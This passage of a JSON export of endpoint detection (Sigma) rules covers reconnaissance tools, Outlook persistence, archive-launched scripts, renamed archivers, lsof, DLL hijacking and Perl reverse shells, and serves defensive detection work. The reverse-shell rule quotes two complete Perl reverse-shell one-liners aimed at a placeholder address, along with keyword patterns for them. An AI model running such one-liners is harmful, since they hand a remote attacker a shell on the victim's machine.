"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.pingcastle.com/",
"https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/"
],
"name": "t1087_002_pingcastle.yml",
"content": "title: PingCastle Execution\nid: 1b864817-8a01-4cfe-9481-20ce115320c8\ndescription: |\n Detects the execution of PingCastle.\n PingCastle is a tool providing Active Directory security indicators and is often used by attackers during the reconnaissance phase to find Active Directory vulnerabilities.\n This tool is often used for legitimate purposes. It is recommended to determine if the usage of this tool was warranted by the system administrators.\nreferences:\n - https://www.pingcastle.com/\n - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\ndate: 2023/03/20\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1087.002\n - attack.t1482\n - attack.t1018\n - attack.t1615\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.PingCastle\n - classification.Windows.Behavior.ActiveDirectory\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'PingCastle.exe'\n - 'PingCastle.dll'\n\n condition: selection\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1b864817-8a01-4cfe-9481-20ce115320c8",
"rule_name": "PingCastle Execution",
"rule_description": "Detects the execution of PingCastle.\nPingCastle is a tool providing Active Directory security indicators and is often used by attackers during reconnaissance phase to find Active Directory vulnerabilities.\nThis tool is often used for legitimate purposes. It is recommended to determine if the usage of this tool was warranted by the system administrators.\n",
"rule_creation_date": "2023-03-20",
"rule_modified_date": "2026-02-25",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1018",
"attack.t1087.002",
"attack.t1482",
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1c0971b5-dd3d-4802-967a-67f521f0ac2c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626798Z",
"creation_date": "2026-03-23T11:45:34.626800Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626804Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md",
"https://attack.mitre.org/techniques/T1137/004/"
],
"name": "t1137_004_outlook_homepage_changed.yml",
"content": "title: Microsoft Outlook Homepage Changed via Registry\nid: 1c0971b5-dd3d-4802-967a-67f521f0ac2c\ndescription: |\n Detects a change of the Microsoft Outlook homepage via the registry.\n Attackers can achieve persistence at Outlook boot via a custom crafted HTML file used as an homepage.\n It is recommended to check the new home page for suspicious content such as command execution and to analyze the process responsible for the registry modification.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md\n - https://attack.mitre.org/techniques/T1137/004/\ndate: 2021/06/24\nmodified: 2026/02/03\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1137.004\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKU\\\\*\\Software\\Microsoft\\Office\\\\*\\Outlook\\WebView\\\\*\\URL'\n\n filter_empty:\n Details: '(Empty)'\n\n condition: selection and not 1 of filter_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1c0971b5-dd3d-4802-967a-67f521f0ac2c",
"rule_name": "Microsoft Outlook Homepage Changed via Registry",
"rule_description": "Detects a change of the Microsoft Outlook homepage via the registry.\nAttackers can achieve persistence at Outlook boot via a custom crafted HTML file used as an homepage.\nIt is recommended to check the new home page for suspicious content such as command execution and to analyze the process responsible for the registry modification.\n",
"rule_creation_date": "2021-06-24",
"rule_modified_date": "2026-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1137.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1c2f6b57-2c30-4918-afa5-ff6fff38e99d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.085596Z",
"creation_date": "2026-03-23T11:45:34.085599Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.085603Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://twitter.com/dez_/status/1620828523094228992",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_002_script_execution_from_archive.yml",
"content": "title: Script Executed from Archive\nid: 1c2f6b57-2c30-4918-afa5-ff6fff38e99d\ndescription: |\n Detects the execution of a script from an archive using wscript.exe or cscript.exe.\n This can be indicative of a user execution of a malicious script, directly from the archive browser.\n It is recommended to investigate the source of the archive file, its content, as well as search for malicious actions performed by the script itself.\nreferences:\n - https://twitter.com/dez_/status/1620828523094228992\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2023/09/05\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.002\n - attack.t1059\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName:\n - 'wscript.exe'\n - 'cscript.exe'\n CommandLine|contains:\n - '?:\\Users\\\\*\\Temp\\RAR$'\n - '?:\\Users\\\\*\\Temp\\7z'\n - '?:\\Users\\\\*\\Temp\\Temp?_*.zip\\'\n - '?:\\Users\\\\*\\Temp\\\\*_*.zip.???\\'\n\n exclusion_ivanti:\n ParentImage:\n - '?:\\Program Files\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n - '?:\\Program Files (x86)\\Ivanti\\Workspace Control\\pfwsmgr.exe'\n\n exclusion_landesk:\n ParentImage|endswith: '\\Microsoft\\Dynamics Ax*\\New\\Files\\VisualCPP*.exe'\n\n exclusion_octave:\n CommandLine: 'wscript.exe ?:\\Users\\\\*AppData\\Local\\Programs\\GNU Octave\\Octave-*\\octave.vbs * ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*_*.zip.???\\\\*'\n\n exclusion_ibm:\n CommandLine: '?:\\Windows\\System32\\WScript.exe ?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*_IBMiAccess_*.zip.dc7\\Windows_Application\\install_*.js '\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1c2f6b57-2c30-4918-afa5-ff6fff38e99d",
"rule_name": "Script Executed from Archive",
"rule_description": "Detects the execution of a script from an archive using wscript.exe or cscript.exe.\nThis can be indicative of a user execution of a malicious script, directly from the archive browser.\nIt is recommended to investigate the source of the archive file, its content, as well as search for malicious actions performed by the script itself.\n",
"rule_creation_date": "2023-09-05",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1c812220-3709-4900-82e9-d3a5410edada",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606332Z",
"creation_date": "2026-03-23T11:45:34.606336Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606343Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1560/001/"
],
"name": "t1560_001_archiver_tool_renamed.yml",
"content": "title: Renamed Archiver Tool Executed\nid: 1c812220-3709-4900-82e9-d3a5410edada\ndescription: |\n Detects when a common archiver tool, such as 7Zip or WinRAR, has been renamed and executed.\n Renamed archivers have been observed in use by threat actors for exfiltrating data.\n It is recommended to investigate this behavior to determine if this archiver is not being used to compress sensitive data for exfiltration and to whitelist any recurring archive compressions such as backups.\nreferences:\n - https://attack.mitre.org/techniques/T1560/001/\ndate: 2020/12/15\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1560\n - attack.t1560.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Collection\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_original:\n - Description: 'Command line RAR'\n - OriginalFileName:\n - '7z.exe'\n - '7za.exe'\n selection_goodname:\n - Image:\n - '*\\rar.exe'\n - '*\\unrar.exe'\n - '*\\7z.exe'\n - '*\\7za.exe'\n\n exclusion_unetbootin:\n Image|endswith: 'AppData\\Local\\Temp\\sevnz.exe'\n\n exclusion_known_fp:\n - ParentImage:\n - '?:\\Program Files (x86)\\Western Digital\\Discovery\\Current\\WD Discovery.exe'\n - '?:\\Program Files (x86)\\NCH Software\\ExpressZip\\expresszip.exe'\n - '*\\AppData\\Roaming\\NCH Software\\Program Files\\ExpressZip\\expresszip.exe'\n # C:\\Users\\XXX\\AppData\\Local\\Temp\\7zS8D4DFD71\\BlueStacksInstaller.exe\n # D:\\Utilisateurs\\XXX\\AppData\\Local\\Temp\\7zS033C881C\\BlueStacksInstaller.exe\n - '*\\AppData\\Local\\Temp\\7zs????????\\BlueStacksInstaller.exe'\n # C:\\Users\\XXX\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WD_Discovery_637623756875899969\\WD Discovery\\WD Discovery.exe\n - '*\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WD_Discovery_*\\WD Discovery\\WD Discovery.exe'\n - Image:\n - '?:\\Program Files 
(x86)\\BluestacksCN\\Engine\\7zr.exe'\n - '?:\\Program Files\\BlueStacks_nxt\\7zr.exe'\n - '?:\\Program Files (x86)\\Lenovo\\LockScreen\\7zwrap.exe'\n - '*\\AppData\\Local\\Temp\\WDDiscoveryInstaller\\WDDiscoveryInstaller.Resources.7za.exe'\n - '*\\NCH Software\\Components\\7zip\\7Zip.exe'\n - '*\\NCH Software\\Components\\7za32\\7Za32.exe'\n - '?:\\program files\\wondershare\\pdfelement*\\zip.exe'\n - '?:\\Program Files\\Wondershare\\Wondershare PDFelement pour Windows *\\zip.exe'\n - '?:\\Windows\\LTSvc\\_LTUPDATE\\LabtechUpdate.exe'\n\n condition: selection_original and not selection_goodname and not 1 of exclusion_*\nfalsepositives:\n - Legitimate use of archivers by an administrator or a third-party application.\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1c812220-3709-4900-82e9-d3a5410edada",
"rule_name": "Renamed Archiver Tool Executed",
"rule_description": "Detects when a common archiver tool, such as 7Zip or WinRAR, has been renamed and executed.\nRenamed archivers have been observed in use by threat actors for exfiltrating data.\nIt is recommended to investigate this behavior to determine if this archiver is not being used to compress sensitive data for exfiltration and to whitelist any recurring archive compressions such as backups.\n",
"rule_creation_date": "2020-12-15",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection"
],
"rule_technique_tags": [
"attack.t1560",
"attack.t1560.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294983Z",
"creation_date": "2026-03-23T11:45:35.294987Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.295020Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/"
],
"name": "t1033_lsof_macos.yml",
"content": "title: Currently Open Files Listed via Lsof (macOS)\nid: 1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b\ndescription: |\n Detects the execution of the lsof command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of open files and the user associated with each of them.\n It is recommended to check for malicious behavior by the process launching lsof.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\ndate: 2022/11/22\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/sbin/lsof'\n ParentImage|contains: '?'\n GrandparentImage|contains: '?'\n\n exclusion_parentimage:\n ParentImage:\n - '/Applications/GlobalProtect.app/Contents/Resources/PanGPS'\n - '/Applications/PyCharm CE.app/Contents/MacOS/pycharm'\n - '/Applications/PyCharm.app/Contents/MacOS/pycharm'\n - '/Applications/PyCharm Professional Edition.app/Contents/MacOS/pycharm'\n - '/Users/*/Applications/PyCharm Professional Edition.app/Contents/MacOS/pycharm'\n - '/Applications/Webex.app/Contents/MacOS/Webex'\n - '/Applications/WebStorm.app/Contents/MacOS/webstorm'\n - '/Users/*/Applications/WebStorm.app/Contents/MacOS/webstorm'\n - '/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n - '/Users/*/Library/Application Support/Steam/Steam.AppBundle/Steam/Contents/MacOS/steam_osx'\n - '/Applications/AWS VPN Client/AWS VPN Client.app/Contents/Resources/AWS VPN Client/Contents/MacOS/ACVCHelperTool'\n - '/Library/PrivilegedHelperTools/com.amazonaws.acvc.helper'\n - '/Applications/Docker.app/Contents/MacOS/com.docker.backend'\n - '/Applications/GitKraken.app/Contents/Frameworks/GitKraken Helper (Renderer).app/Contents/MacOS/GitKraken Helper (Renderer)'\n - '/Users/*/Applications/IntelliJ IDEA Ultimate.app/Contents/MacOS/idea'\n - 
'/applications/rider.app/contents/macos/rider'\n - '/Applications/GoLand.app/Contents/MacOS/goland'\n - '/Applications/IntelliJ IDEA CE.app/Contents/MacOS/idea'\n - '/Applications/RubyMine.app/Contents/MacOS/rubymine'\n - '/Users/*/Applications/PhpStorm.app/Contents/MacOS/phpstorm'\n - '/Users/*/Applications/Android Studio.app/Contents/MacOS/studio'\n - '/Applications/CleanMyMac_5.app/Contents/MacOS/CleanMyMac_5'\n - '/Applications/Android Studio Preview.app/Contents/MacOS/studio'\n - '/Applications/CleanMyMac X.app/Contents/MacOS/CleanMyMac X'\n - '/Users/*/Library/Application Support/WebEx Folder/Add-ons/Cisco WebEx Start.app/Contents/MacOS/Cisco WebEx Start'\n - '/Applications/SekoiaEndpointAgent.app/Contents/MacOS/SekoiaEndpointAgent'\n\n exclusion_grandparentimage:\n GrandparentImage:\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper.app/Contents/MacOS/Code - Insiders Helper'\n - '/Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app/Contents/MacOS/VMware Fusion Applications Menu'\n - '/Library/Developer/CommandLineTools/Library/Frameworks/Python3.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n - '/private/var/folders/*/com.docker.install/in_progress/Docker.app/Contents/MacOS/install'\n - '/Applications/Docker.app/Contents/MacOS/install'\n\n # /usr/sbin/lsof -g -o -R /Users//Library/Application Support/WebEx Folder/MC_/Meeting Center.app\n exclusion_cisco_meeting_center:\n ParentImage|endswith: '/Cisco WebEx Start'\n CommandLine|contains|all:\n - '/usr/sbin/lsof -g -o -R /Users/'\n - 'Library/Application Support/WebEx Folder/MC_'\n - 'Meeting Center.app'\n\n # lsof /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions//Google Chrome Framework\n exclusion_google_chrome_updater:\n CommandLine: 'lsof /Applications/Google Chrome.app/Contents/Frameworks/Google Chrome Framework.framework/Versions/*/Google Chrome Framework'\n\n # 
lsof -OPln -p \n exclusion_vs_code:\n GrandparentImage:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code - Helper (Renderer).app/Contents/MacOS/Code - Helper (Renderer)'\n - '/Applications/Visual Studio Code - Insiders.app/Contents/Frameworks/Code - Insiders Helper (Renderer).app/Contents/MacOS/Code - Insiders Helper (Renderer)'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n CommandLine|startswith: 'lsof -OPln -p'\n\n exclusion_cwd:\n ParentCommandLine: '/bin/sh -c lsof -OPln * | grep cwd'\n\n exclusion_ampdevicesagent:\n CommandLine|startswith: '/usr/sbin/lsof -c AMPDevicesAgent'\n\n exclusion_edge:\n CommandLine: 'lsof /Applications/Microsoft Edge.app/Contents/Frameworks/Microsoft Edge Framework.framework/Versions/*/Microsoft Edge Framework'\n\n exclusion_ninjarmm:\n ParentImage: '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n\n exclusion_rider:\n ParentImage:\n - '/Users/*/Applications/Rider.app/Contents/MacOS/rider'\n - '/Applications/Rider 2.app/Contents/MacOS/rider'\n\n exclusion_inteliJ_idea:\n ParentImage|endswith: '/IntelliJ IDEA.app/Contents/MacOS/idea'\n # TODO : signed: 'true'\n\n exclusion_bluejeans:\n ParentImage: '/Applications/BlueJeans.app/Contents/Resources/daemon/BlueJeansHelper.app/Contents/MacOS/BlueJeansHelper'\n\n exclusion_activity_monitor:\n ParentImage: '/System/Applications/Utilities/Activity Monitor.app/Contents/MacOS/Activity Monitor'\n\n exclusion_android_studio:\n ParentImage: '/Applications/Android Studio.app/Contents/MacOS/studio'\n\n exclusion_erlang:\n Ancestors|startswith: '/bin/bash|/bin/bash|/opt/homebrew/Cellar/erlang/'\n\n # lsof -d 0-9999999 -lna -p \n exclusion_unknown:\n CommandLine|re: '^lsof -d 0-9999999 -lna -p \\d+$'\n ParentCommandLine: '/bin/sh -s unix:cmd'\n GrandparentCommandLine: '/bin/sh -s unix:cmd'\n\n exclusion_cleanmymac:\n ProcessSigned: 'true'\n ProcessSignatureSigningId: 'com.macpaw.CleanMyMac*'\n\n condition: 
selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1cebc8c1-cd9a-4396-aa08-8d8c7cd6838b",
"rule_name": "Currently Open Files Listed via Lsof (macOS)",
"rule_description": "Detects the execution of the lsof command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of open files and the user associated with each of them.\nIt is recommended to check for malicious behavior by the process launching lsof.\n",
"rule_creation_date": "2022-11-22",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1cf5a84d-3577-4fed-aad6-e9be68687766",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096335Z",
"creation_date": "2026-03-23T11:45:34.096338Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096343Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tcmsetup.yml",
"content": "title: DLL Hijacking via tcmsetup.exe\nid: 1cf5a84d-3577-4fed-aad6-e9be68687766\ndescription: |\n Detects potential Windows DLL Hijacking via tcmsetup.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tcmsetup.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\TAPI32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1cf5a84d-3577-4fed-aad6-e9be68687766",
"rule_name": "DLL Hijacking via tcmsetup.exe",
"rule_description": "Detects potential Windows DLL Hijacking via tcmsetup.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d0a5e73-d3a2-4ecd-9969-fe46c41edd38",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618088Z",
"creation_date": "2026-03-23T11:45:34.618090Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618094Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux",
"https://attack.mitre.org/techniques/T1059/004/"
],
"name": "t1059_004_reverse_shell_perl_macos.yml",
"content": "title: Reverse Shell Executed via Perl (macOS)\nid: 1d0a5e73-d3a2-4ecd-9969-fe46c41edd38\ndescription: |\n Detects a suspicious command line related to a reverse shell execution via Perl.\n A reverse shell is a shell session that is initiated from a remote machine.\n Attackers often use reverse shell to bypass firewalls restrictions.\n It is recommended to check for malicious behavior by the process launching the command and its potential children.\nreferences:\n - https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/linux\n - https://attack.mitre.org/techniques/T1059/004/\ndate: 2022/11/14\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.004\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Script.perl\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection_base:\n Image: '/usr/bin/perl'\n\n # perl -e 'use Socket;$i=\"10.0.0.1\";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n selection_variant1:\n CommandLine|contains|all:\n - ' Socket'\n - 'socket('\n - 'connect('\n - 'open('\n - 'STDIN'\n - 'STDOUT'\n - 'exec('\n\n # perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"[IPADDR]:[PORT]\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n selection_variant2:\n CommandLine|contains|all:\n - 'perl'\n - 'IO::Socket::INET('\n - 'STDIN'\n - 'fdopen('\n - 'system'\n\n condition: selection_base and 1 of selection_variant*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "1d0a5e73-d3a2-4ecd-9969-fe46c41edd38",
"rule_name": "Reverse Shell Executed via Perl (macOS)",
"rule_description": "Detects a suspicious command line related to a reverse shell execution via Perl.\nA reverse shell is a shell session that is initiated from a remote machine.\nAttackers often use reverse shell to bypass firewalls restrictions.\nIt is recommended to check for malicious behavior by the process launching the command and its potential children.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2025-03-31",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "1d290732-2a4c-43db-875e-699d2462cd5d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
